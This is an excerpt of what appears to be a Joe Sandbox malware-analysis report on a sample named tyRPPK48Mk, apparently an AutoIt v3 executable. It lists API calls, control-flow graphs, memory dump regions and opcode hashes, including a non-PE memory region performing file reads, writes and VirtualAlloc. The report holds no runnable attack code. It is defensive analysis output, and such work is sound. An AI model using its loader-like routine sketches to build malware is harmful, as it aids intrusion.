                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A67998,000000FF,00000000), ref: 00410552
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Default
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1579825452-753088835
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: __fread_nolock_fseek_memmove_strcat
• String ID: AU3!$EA06
• API String ID: 1268643489-2658333250
• Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
• Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
• Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
• Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

Control-flow Graph
APIs
• DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
• KillTimer.USER32(?,00000001,?), ref: 004011B9
• PostQuitMessage.USER32(00000000), ref: 004011CB
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
• CreatePopupMenu.USER32 ref: 00401204
Strings
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
• Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
• Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
• Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

Control-flow Graph
APIs
• _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• std::exception::exception.LIBCMT ref: 00411626
• std::exception::exception.LIBCMT ref: 00411640
• __CxxThrowException@8.LIBCMT ref: 00411651
Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ,*H$4*H$@fI
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 615853336-1459471987
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 2065 49386e8-493873a call 49385e8 CreateFileW 2068 4938743-4938750 2065->2068 2069 493873c-493873e 2065->2069 2072 4938763-493877a VirtualAlloc 2068->2072 2073 4938752-493875e 2068->2073 2070 493889c-49388a0 2069->2070 2074 4938783-49387a9 CreateFileW 2072->2074 2075 493877c-493877e 2072->2075 2073->2070 2077 49387ab-49387c8 2074->2077 2078 49387cd-49387e7 ReadFile 2074->2078 2075->2070 2077->2070 2079 493880b-493880f 2078->2079 2080 49387e9-4938806 2078->2080 2081 4938811-493882e 2079->2081 2082 4938830-4938847 WriteFile 2079->2082 2080->2070 2081->2070 2085 4938872-4938897 CloseHandle VirtualFree 2082->2085 2086 4938849-4938870 2082->2086 2085->2070 2086->2070
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0493872D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: db087c0302d8ffa699348145200ad59923ea17d1522a3167b85c8a602d572f01
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB512975A50208FBEF20EFA0CC49FDE77B9AF49741F108954F61AEB180DA74A6409B60

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 2095 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2098 427190-4271ae RegQueryValueExW 2095->2098 2099 40e4eb-40e4f0 2095->2099 2100 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2098->2100 2101 42721a-42722a RegCloseKey 2098->2101 2106 427210-427219 call 436508 2100->2106 2107 4271f7-42720e call 402160 2100->2107 2106->2101 2107->2106
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1586453840-614718249
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 2112 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt v3$edit

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 2113 401b80-401b96 2114 401b9c-401bb3 call 4013c0 2113->2114 2115 401c7e-401c84 2113->2115 2118 42722b-42723b LoadStringW 2114->2118 2119 401bb9-401bd4 call 402160 2114->2119 2121 427246-427253 call 40e0a0 2118->2121 2124 427258-427275 call 40d200 call 4348de 2119->2124 2125 401bda-401bde 2119->2125 2129 401bf3-401c79 call 412f40 call 412fba call 411567 Shell_NotifyIconW call 402250 2121->2129 2124->2129 2137 42727b-42728f call 40d200 call 4348de 2124->2137 2125->2121 2127 401be4-401bee call 40d200 2125->2127 2127->2129 2129->2115
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Line:
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Close$OpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1607946009-824357125
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00410340
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3170942423-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0493A068: Sleep.KERNELBASE(000001F4), ref: 0493A079
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0493A2A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFileSleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: QCTMDQBDDWA12LNO5EWW
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2694422964-2706631413
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8af22172c24b9f823577794356130d6f01fdd33e503172ee4b2c1517d50a8c95
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c11959b118bab67878e7edc4801894850563b894122ebc192a7f48d679a90578
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8af22172c24b9f823577794356130d6f01fdd33e503172ee4b2c1517d50a8c95
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F51C270D04288DBEF11DBA4C818BEEBB79AF45305F0041A9E648BB2C0D7B95B48CB65
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4104443479-232661952
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 0042961B
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
• String ID: X$pWH
• API String ID: 85490731-941433119
• Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
